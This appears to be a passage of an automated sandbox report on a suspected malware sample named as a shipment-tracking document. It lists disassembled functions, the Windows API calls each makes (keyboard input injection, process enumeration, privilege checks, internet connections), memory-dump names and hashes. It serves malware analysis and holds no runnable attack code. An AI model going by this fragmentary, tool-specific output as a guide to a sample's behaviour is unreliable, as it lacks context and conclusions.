                                                    • Opcode ID: a48fa0554349ed0d89d3dc1aea1b98156696e45624a78e71b9bec94b3bbdb178
                                                    • Instruction ID: 73df531c618adc8028d30d442f3816c02883d28ed87fe4ea780264d0cc809cf9
                                                    • Opcode Fuzzy Hash: a48fa0554349ed0d89d3dc1aea1b98156696e45624a78e71b9bec94b3bbdb178
                                                    • Instruction Fuzzy Hash: C5418835A402189FDB11CF58C8C4BA97BF5FB49710F1884A9EE189F364D730E841EB92
                                                    Function 00F20AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F20B27
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F20B43
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F20BA9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F20BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 3644f87deb0dd10535aa49fea9cafaa65e29ac808cfe9ba9ca68cf994e45f2b6
                                                    • Instruction ID: 02c9106ec958f270ebffcdfa917d530ba74bcb07fdddbf7792db022413e109c0
                                                    • Opcode Fuzzy Hash: 3644f87deb0dd10535aa49fea9cafaa65e29ac808cfe9ba9ca68cf994e45f2b6
                                                    • Instruction Fuzzy Hash: EE314B72D4022CAEFF308B25AC05BFABBA5BB85334F08435AF895D11D2CB748985B755
                                                    Function 00F20C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F20C66
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F20C82
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F20CE1
                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F20D33
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 39f4bf523deb4fcffe84e493e6ce7ea4549d4917c32d3f85f08b7a0fe65e0b5f
                                                    • Instruction ID: 94665e99deafe1c6d884b373a55dc9a009abb45b33b19a79f527db9f758b7f56
                                                    • Opcode Fuzzy Hash: 39f4bf523deb4fcffe84e493e6ce7ea4549d4917c32d3f85f08b7a0fe65e0b5f
                                                    • Instruction Fuzzy Hash: DE316E72E802285EFF348B64AC047FEBB66AB45330F44431AE485511D2CB795D45B751
                                                    Function 00EF61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EF61FB
                                                    • __isleadbyte_l.LIBCMT ref: 00EF6229
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EF6257
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EF628D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 404162062f5ea21d6975e202fc7ea31559ba3356cb048b91296a17b0c3630447
                                                    • Instruction ID: c2547e198bccd41a44e3d41a14b92f0587320e0f484b474d40c88d11cb81f587
                                                    • Opcode Fuzzy Hash: 404162062f5ea21d6975e202fc7ea31559ba3356cb048b91296a17b0c3630447
                                                    • Instruction Fuzzy Hash: 4831DE3060024EAFEF218F65CC44BBB7BB9FF42314F155068EA28A71A1E731E950DB90
                                                    Function 00F44EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00F44F02
                                                      • Part of subcall function 00F23641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F2365B
                                                      • Part of subcall function 00F23641: GetCurrentThreadId.KERNEL32 ref: 00F23662
                                                      • Part of subcall function 00F23641: AttachThreadInput.USER32(00000000,?,00F25005), ref: 00F23669
                                                    • GetCaretPos.USER32(?), ref: 00F44F13
                                                    • ClientToScreen.USER32(00000000,?), ref: 00F44F4E
                                                    • GetForegroundWindow.USER32 ref: 00F44F54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: c3fa53e8d7962e8cdd8b4bc34bf86cf05ec5a56a3d16ef4a68c04ed1daa002cf
                                                    • Instruction ID: 73622b198842e97c8755f24666a81a660ec8e27c32ffdc3c9d3ef1cae22d7316
                                                    • Opcode Fuzzy Hash: c3fa53e8d7962e8cdd8b4bc34bf86cf05ec5a56a3d16ef4a68c04ed1daa002cf
                                                    • Instruction Fuzzy Hash: B7312C72D00108AFDB04EFA5CD85EEFB7F9EF99300F10406AE815E7201DA75AE458BA0
                                                    Function 00F23C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F23C7A
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F23C88
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F23CA8
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F23D52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: ec0db7c770d0600e977326d2f810467fb63e2b4d8a0a2aefd0797dcd28461159
                                                    • Instruction ID: 397ace4a77e6df27da22b17cfd70c21802f5f0b7206a7f0a11dc76b56706ae1f
                                                    • Opcode Fuzzy Hash: ec0db7c770d0600e977326d2f810467fb63e2b4d8a0a2aefd0797dcd28461159
                                                    • Instruction Fuzzy Hash: 4B31C2711083099FD300EF20D881FAFBBE8EFD9350F50082DF495961A1EB71AA4ADB52
                                                    Function 00F4C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • GetCursorPos.USER32(?), ref: 00F4C4D2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EFB9AB,?,?,?,?,?), ref: 00F4C4E7
                                                    • GetCursorPos.USER32(?), ref: 00F4C534
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EFB9AB,?,?,?), ref: 00F4C56E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 257118e91e85f8e3506c5323ae3ae2bd795f2a5c16ce932cd1c7f40d4674a476
                                                    • Instruction ID: ca3511d03af1dd27375d599c6c7ec7a1e1865349b296ec0c2de2e8f1e3f1fa95
                                                    • Opcode Fuzzy Hash: 257118e91e85f8e3506c5323ae3ae2bd795f2a5c16ce932cd1c7f40d4674a476
                                                    • Instruction Fuzzy Hash: 7B318D39A01018AFDB65CF58C858EFE7FB5EB09760F484069FD099B261C731A950EBE4
                                                    Function 00F18656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F18121
                                                      • Part of subcall function 00F1810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F1812B
                                                      • Part of subcall function 00F1810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1813A
                                                      • Part of subcall function 00F1810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18141
                                                      • Part of subcall function 00F1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18157
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F186A3
                                                    • _memcmp.LIBCMT ref: 00F186C6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F186FC
                                                    • HeapFree.KERNEL32(00000000), ref: 00F18703
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: bd70324017f22d7ae364b2ca40a9d93e0135155198f7c0526dc254c79af6f572
                                                    • Instruction ID: 5ebcbe5089e06436e15dbadbbd51eef1e2d5f55d1d0c8ddeae7717d9fed4d385
                                                    • Opcode Fuzzy Hash: bd70324017f22d7ae364b2ca40a9d93e0135155198f7c0526dc254c79af6f572
                                                    • Instruction Fuzzy Hash: 6121B031E00108EFDB04DFA4CA58BEEB7F8EF41354F144059E844A7241DB31AE46EB50
                                                    Function 00EE098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00EE09AE
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F27896,?,?,00000000), ref: 00EC5A2C
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F27896,?,?,00000000,?,?), ref: 00EC5A50
                                                    • _fprintf.LIBCMT ref: 00EE09E5
                                                    • OutputDebugStringW.KERNEL32(?), ref: 00F15DBB
                                                      • Part of subcall function 00EE4AAA: _flsall.LIBCMT ref: 00EE4AC3
                                                    • __setmode.LIBCMT ref: 00EE0A1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: 7b5f8a61c0492adc18967ccdfc137eefdca6ee26fe531554c32c6cb6c16d308d
                                                    • Instruction ID: ebc603b2f6a1922952ec5048f85f01ac1a97c793f66f3eab2fa0c1742183321c
                                                    • Opcode Fuzzy Hash: 7b5f8a61c0492adc18967ccdfc137eefdca6ee26fe531554c32c6cb6c16d308d
                                                    • Instruction Fuzzy Hash: AC116AB290428C6FCB04B7B6AC46DFE77E89F85320F101069F104772C3EE71598663A0
                                                    Function 00F31767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F317A3
                                                      • Part of subcall function 00F3182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F3184C
                                                      • Part of subcall function 00F3182D: InternetCloseHandle.WININET(00000000), ref: 00F318E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 66ecd8f62a3b4bed46884d4da4cd71b3e92821d6240904bd0def5591a4bf36fb
                                                    • Instruction ID: aedf0b56048099a74631835fc86cdf91cfc317739dcac4ab8264951c7fa85fe0
                                                    • Opcode Fuzzy Hash: 66ecd8f62a3b4bed46884d4da4cd71b3e92821d6240904bd0def5591a4bf36fb
                                                    • Instruction Fuzzy Hash: F421C036600605BFEB129F60DC01FBBBBA9FF49730F14402AFA1596650DB75D811BBA4
                                                    Function 00F23A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F4FAC0), ref: 00F23A64
                                                    • GetLastError.KERNEL32 ref: 00F23A73
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F23A82
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F4FAC0), ref: 00F23ADF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 883acbd4e77cf253a50acff92e2aef4ccd528350a3de2484f4678ee59baf1eac
                                                    • Instruction ID: e821a19f826b70eccc63187157ea4162905c214cb7a69d7bbd89900f7a29f545
                                                    • Opcode Fuzzy Hash: 883acbd4e77cf253a50acff92e2aef4ccd528350a3de2484f4678ee59baf1eac
                                                    • Instruction Fuzzy Hash: 8B21D6795083158F8300EF24D88196B7BE4EE5A364F104A2DF4D9C72A1D739DE4ADF42
                                                    Function 00F1DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F1F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F1DCD3,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?), ref: 00F1F0CB
                                                      • Part of subcall function 00F1F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F1DCD3,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1F0F1
                                                      • Part of subcall function 00F1F0BC: lstrcmpiW.KERNEL32(00000000,?,00F1DCD3,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?), ref: 00F1F122
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1DCEC
                                                    • lstrcpyW.KERNEL32(00000000,?,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1DD12
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1DD46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 794ad2bc0177174d0cc59f01f371e5df89b2af12c03a1912de86474675efe899
                                                    • Instruction ID: d50f5737d67ff8926166623b67f3ec17258fda56dc74b303b14b9e5b14bc3fc4
                                                    • Opcode Fuzzy Hash: 794ad2bc0177174d0cc59f01f371e5df89b2af12c03a1912de86474675efe899
                                                    • Instruction Fuzzy Hash: DC11D33A600309EBCB259F34DC45DBA77B9FF45350B40902AF806CB2A0EB719880E791
                                                    Function 00EF50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00EF5101
                                                      • Part of subcall function 00EE571C: __FF_MSGBANNER.LIBCMT ref: 00EE5733
                                                      • Part of subcall function 00EE571C: __NMSG_WRITE.LIBCMT ref: 00EE573A
                                                      • Part of subcall function 00EE571C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000000,?,?,?,00EE0DD3,?), ref: 00EE575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 9e109eac45363d031a884d12f7e1760039947d5e2aa189f4080918f466bc90fd
                                                    • Instruction ID: f787c2d96b7733a98cafca980563b66cb6871cf002835456a6e474980b6524ce
                                                    • Opcode Fuzzy Hash: 9e109eac45363d031a884d12f7e1760039947d5e2aa189f4080918f466bc90fd
                                                    • Instruction Fuzzy Hash: 7311E373502E1DAECB312FB1AC05BBE37D89B21365F102529FB0CB6251DF3099409790
                                                    Function 00EC44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EC44CF
                                                      • Part of subcall function 00EC407C: _memset.LIBCMT ref: 00EC40FC
                                                      • Part of subcall function 00EC407C: _wcscpy.LIBCMT ref: 00EC4150
                                                      • Part of subcall function 00EC407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC4160
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00EC4524
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC4533
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EFD4B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: aa2a8d9835ed30bed971c52466c5576cb323836384a0c92e30884e8806d76479
                                                    • Instruction ID: aa035fb0f1191ff67d9261b1b4c0b3a4adb672b76e21e168e155cbbee4e9ce9f
                                                    • Opcode Fuzzy Hash: aa2a8d9835ed30bed971c52466c5576cb323836384a0c92e30884e8806d76479
                                                    • Instruction Fuzzy Hash: 032128B49083989FE7328B248C55FF6BFEC9B01308F04108DE79E66181C3752985D741
                                                    Function 00F36369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F27896,?,?,00000000), ref: 00EC5A2C
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F27896,?,?,00000000,?,?), ref: 00EC5A50
                                                    • gethostbyname.WSOCK32(?), ref: 00F36399
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F363A4
                                                    • _memmove.LIBCMT ref: 00F363D1
                                                    • inet_ntoa.WSOCK32(?), ref: 00F363DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
